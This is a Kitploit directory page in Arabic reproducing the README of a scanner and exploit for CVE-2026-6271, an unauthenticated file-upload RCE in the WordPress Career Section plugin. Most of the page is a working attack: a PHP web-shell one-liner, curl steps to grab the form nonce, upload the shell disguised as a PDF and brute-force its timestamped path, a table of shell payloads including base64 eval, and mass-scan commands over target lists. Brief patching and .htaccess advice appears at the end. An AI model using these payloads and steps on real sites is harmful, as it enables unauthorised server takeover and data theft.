Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-6271 — ماسح آلي لـ CVE-2026-6271، وهو ثغرة حرجة في رفع الملفات غير الموثقة تؤدي إلى تنفيذ أوامر عن بُعد (RCE) في إضافة WordPress Career Section. يدعم المسح متعدد الخيوط، وأنواع متعددة من الصدف، والتكامل مع البروكسي. | Kitploit
أدوات/GitHubGitHub/xxconi/cve-2026-6271
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمر
GitHubxxconi/cve-2026-6271

CVE-2026-6271

ماسح آلي لـ CVE-2026-6271، وهو ثغرة حرجة في رفع الملفات غير الموثقة تؤدي إلى تنفيذ أوامر عن بُعد (RCE) في إضافة WordPress Career Section. يدعم المسح متعدد الخيوط، وأنواع متعددة من الصدف، والتكامل مع البروكسي.

عرض المستودع
1منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-6271 — Career Section WordPress Plugin RCE Scanner

الإضافة: قسم الوظائف (career-section) معرف CVE: CVE-2026-6271 درجة CVSS: 9.8 (حرجة) متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H نوع الثغرة: رفع ملف غير مصادق عليه → تنفيذ تعليمات برمجية عن بُعد الإصدار المتأثر: <= 1.7 الإصدار المصحح: 1.8 تاريخ النشر: 13 مايو 2026 الباحث: Paolo Tresso — Wordfence


📌 حول الثغرة

تتيح إضافة Career Section لأصحاب المواقع نشر إعلانات الوظائف وجمع الطلبات. تحتوي كل صفحة إعلان وظيفة على نموذج "Apply Now" يتضمن حقل تحميل ملف السيرة الذاتية (CV).

في الإصدارات 1.7 والإصدارات الأقدم، يقبل معالج التحميل أي نوع ملف — بما في ذلك .php. نظرًا لأن النموذج عام ومضمن رمز CSRF في HTML الصفحة، يمكن استغلال هذه الثغرة بدون الحاجة إلى أي حساب أو صلاحية.


⚙️ التحليل الفني

لماذا لا توفر حماية Nonce؟

Nonces في WordPress هي رموز CSRF، وليست رموز مصادقة. يتم تضمين قيمة nonce في HTML الصفحة لكل زائر:

root@kitploit:~
<script id='prosolwpclient-public-js-extra'>
<!-- templates/single-csection.php — line 316 -->
<?php wp_nonce_field( 'csaf_form_submission', 'csaf_form_nonce' ); ?>

يمكن لأي زائر غير مصادق عليه الحصول على nonce صالح وتجاوز التحقق.

عدم التحقق من نوع الملف

root@kitploit:~
// templates/single-csection.php — lines 170–182 (version 1.7)
if ( ! empty( $_FILES['cv']['name'] ) && ! empty( $_FILES['cv']['tmp_name'] ) ) {

    $original_name = sanitize_file_name( $_FILES['cv']['name'] );
    $name_file     = time() . '_' . $original_name;
    $destination   = $cs_dir . '/' . $name_file;

    // لا يوجد فحص للامتداد — يتم قبول أي شيء بما في ذلك .php
    if ( $wp_filesystem->move( $_FILES['cv']['tmp_name'], $destination, true ) ) {
        $uploaded_file_url = $upload_dir['baseurl']
                           . '/cs_applicant_submission_files/'
                           . $name_file;
    }
}

sanitize_file_name() ينظف الأحرف الخاصة فقط، ولا يمنع الامتدادات الخطيرة.

دليل التحميل

root@kitploit:~
wp-content/uploads/cs_applicant_submission_files/<timestamp>_<filename>

لا يحتوي هذا الدليل على ملف .htaccess يمنع تشغيل PHP.


🔴 لماذا تعتبر حرجة؟

السببالوصف
لا حاجة للمصادقةNonce مضمن في HTML العام
لا قيود على نوع الملفيتم قبول .php و.php5 و.phtml
لا حماية .htaccessيمكن تشغيل PHP في دليل التحميل
اسم ملف يمكن توقعهtime()_filename → هجوم القوة العمياء على الطابع الزمني

🧪 إثبات المفهوم (يدوي)

⚠️ إخلاء مسؤولية: هذا الإثبات لأغراض تعليمية فقط. اختبر فقط على أنظمتك الخاصة أو التي لديك إذن كتابي صريح لاختبارها.

المتطلبات الأساسية:

  • إضافة Career Section مثبتة ونشطة (إصدار ≤ 1.7)
  • تم نشر إعلان وظيفة واحد على الأقل

الخطوة 1 — إنشاء ويب شل PHP

root@kitploit:~
echo '<?php system($_GET["cmd"]); ?>' > shell.php

الخطوة 2 — الحصول على Nonce

root@kitploit:~
TARGET="http://target.com"
JOB_URL="$TARGET/careers/software-engineer/"

NONCE=$(curl -s "$JOB_URL" \
  | grep -oP 'name="csaf_form_nonce" value="\K[^"]+')

echo "Nonce: $NONCE"

البنية التي سيتم البحث عنها في مصدر الصفحة:

root@kitploit:~
<input type="hidden"
       id="csaf_form_nonce"
       name="csaf_form_nonce"
       value="a1b2c3d4e5" />

الخطوة 3 — تحميل الويب شل

root@kitploit:~
TS=$(date +%s)

curl -s -X POST "$JOB_URL" \
  -F "first_name=John" \
  -F "last_name=Doe" \
  -F "present_address=123 Main St" \
  -F "[email protected]" \
  -F "mobile_no=1234567890" \
  -F "post_name=Engineer" \
  -F "submit=Submit" \
  -F "csaf_form_nonce=$NONCE" \
  -F "[email protected];type=application/pdf" \
  | grep -o "Application has been sent"

الخطوة 4 — تشغيل RCE

اسم الملف بتنسيق <timestamp>_shell.php. جرب الطوابع الزمنية حول $TS:

root@kitploit:~
UPLOADS="$TARGET/wp-content/uploads/cs_applicant_submission_files"

for T in $(seq $((TS-2)) $((TS+2))); do
  URL="$UPLOADS/${T}_shell.php"
  RESULT=$(curl -s "$URL?cmd=id")
  if echo "$RESULT" | grep -q "uid="; then
    echo "Webshell نشط: $URL"
    echo "مخرجات RCE  : $RESULT"
    break
  fi
done

المخرجات المتوقعة:

root@kitploit:~
Webshell نشط: http://target.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php
مخرجات RCE  : uid=33(www-data) gid=33(www-data) groups=33(www-data)

🛠️ الماسح الآلي

التثبيت

root@kitploit:~
git clone https://github.com/kullanici/cve-2026-6271-scanner
cd cve-2026-6271-scanner
pip install -r requirements.txt

requirements.txt

root@kitploit:~
requests

🚀 الاستخدام

هدف واحد

root@kitploit:~
python career_section_rce.py -u http://hedef.com

مع رابط الوظيفة مباشرة

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --job-url http://hedef.com/careers/engineer/

مع التحقق من الشل

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --verify-cmd "whoami"

فحص جماعي

root@kitploit:~
python career_section_rce.py -l targets.txt -t 20 -o sonuclar.txt

زيادة نافذة الطابع الزمني (للخوادم البطيئة)

root@kitploit:~
python career_section_rce.py -u http://hedef.com --ts-window 10

شل كامل مع بروكسي (Burp Suite)

root@kitploit:~
python career_section_rce.py -u http://hedef.com \
  --shell-type full \
  --proxy http://127.0.0.1:8080

⚙️ المعاملات

المعاملالاختصارالوصفالافتراضي
--url-uرابط الهدف الفردي—
--list-lملف قائمة الأهداف—
--threads-tعدد الخيوط10
--output-oملف المخرجاتrce_confirmed.txt
--job-url—رابط صفحة الوظيفة مباشرة—
--shell-name—اسم الملف المراد تحميلهshell.php
--shell-type—نوع الشلsystem
--verify-cmd—أمر التحقق من RCEid
--ts-window—نافذة هجوم القوة العمياء للطابع الزمني (±ثانية)5
--proxy—رابط البروكسي—
--timeout—مهلة الطلب (ثانية)10

💀 أنواع الشل

النوعالحمولةالوصف
system<?php system($_GET["cmd"]); ?>أمر نظام أساسي
passthru<?php passthru($_GET["cmd"]); ?>إخراج خام
exec<?php echo exec($_GET["cmd"]); ?>تنفيذ صامت
assert<?php assert($_POST["cmd"]); ?>تقييم عبر POST
b64<?php eval(base64_decode($_POST["cmd"])); ?>تشويش Base64
fullshell_exec + system + exec fallbackشل كامل

📂 موقع تحميل الشل

root@kitploit:~
جذر ووردبريس/
└── wp-content/
    └── uploads/
        └── cs_applicant_submission_files/
            └── <timestamp>_shell.php   ← الشل هنا

الوصول المباشر:

root@kitploit:~
curl "http://hedef.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php?cmd=id"
# uid=33(www-data) gid=33(www-data) groups=33(www-data)

📊 حالات مخرجات الماسح

الحالةالوصف
★ RCE OKتم تحميل الشل + نجاح الأمر
★ SHELL ALIVEالشل قابل للوصول، لكنه أعاد استجابة مختلفة
~ EXEC_DISABLEDالشل موجود لكن exec() معطل على الخادم
? UPLOADEDتم التحميل لكن لم يتم العثور على الطابع الزمني
- BLOCKEDتم حظر نوع الملف (إصدار مصحح)
~ NO_NONCEلم يتم العثور على csaf_form_nonce
~ TIMEOUTانتهت مهلة الاتصال
~ UNREACHالهدف غير قابل للوصول

🖥️ مثال على مخرجات الماسح

root@kitploit:~
[*] 3 أهداف | CVE-2026-6271 Career Section | threads=10

[★ RCE OK    ] http://hedef1.com
  Nonce     : a1b2c3d4e5  (المصدر: http://hedef1.com/careers/engineer/)
  رابط الشل : http://hedef1.com/wp-content/uploads/cs_applicant_submission_files/1747302451_shell.php
  مخرجات RCE: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[- BLOCKED   ] http://hedef2.com  (تم حظر نوع الملف)
[~ NO_NONCE  ] http://hedef3.com  (لم يتم العثور على csaf_form_nonce)

──────────────────────────────────────────────────────────────
  UPLOADED_RCE_OK         :    1  █
  BLOCKED                 :    1  █
  NO_NONCE                :    1  █
──────────────────────────────────────────────────────────────
  تم تأكيد RCE → rce_confirmed.txt
──────────────────────────────────────────────────────────────

🛡️ الدفاع / التصحيح

الإجراءالتطبيق
تحديث الإضافةالترقية إلى Career Section 1.8 أو أحدث
منع تنفيذ PHPإضافة ملف .htaccess إلى دليل التحميل
القائمة البيضاء للامتداداتقبول pdf وdoc وdocx فقط
التحقق من MIMEالتحقق من المحتوى الفعلي باستخدام finfo_file()
قاعدة WAFحظر طلبات تحميل .php

ملف .htaccess لدليل wp-content/uploads/cs_applicant_submission_files/:

root@kitploit:~
<FilesMatch "\.php\d?$">
    Deny from all
</FilesMatch>

Options -ExecCGI
AddType text/plain .php .php5 .phtml .phar

📁 هيكل الملفات

root@kitploit:~
cve-2026-6271-scanner/
├── career_section_rce.py   # الماسح الرئيسي
├── requirements.txt        # التبعيات
└── README.md               # هذا الملف

⚠️ إخلاء مسؤولية قانوني

تم إعداد هذه الأداة وإثبات المفهوم للاستخدام فقط على الأنظمة المصرح بها، لأغراض تعليمية، وفي إطار اختبار الاختراق. استخدامها على أنظمة غير مصرح بها يشكل جريمة بموجب المواد 243-245 من قانون العقوبات التركي وقوانين الجرائم الإلكترونية الدولية. لا يتحمل المطور أي مسؤولية قانونية ناتجة عن إساءة استخدام الأداة.


📄 الترخيص

MIT License — لأغراض التعليم والبحث فقط.


🔗 المراجع

  • Wordfence Advisory
  • WordPress Plugin Directory — Career Section
  • CVSS 3.1 Calculator
تنزيل الأداة